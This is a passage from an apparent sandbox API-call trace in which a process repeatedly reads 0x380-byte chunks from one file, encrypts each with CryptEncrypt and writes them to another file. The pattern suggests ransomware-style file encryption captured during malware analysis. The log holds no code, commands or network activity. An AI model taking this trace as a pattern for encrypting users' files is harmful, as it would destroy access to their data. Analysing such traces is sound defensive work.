lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.629] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.630] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.630] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.631] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.631] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.631] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.631] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.631] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.631] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.632] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.632] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.633] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.633] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.634] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.635] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.635] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, 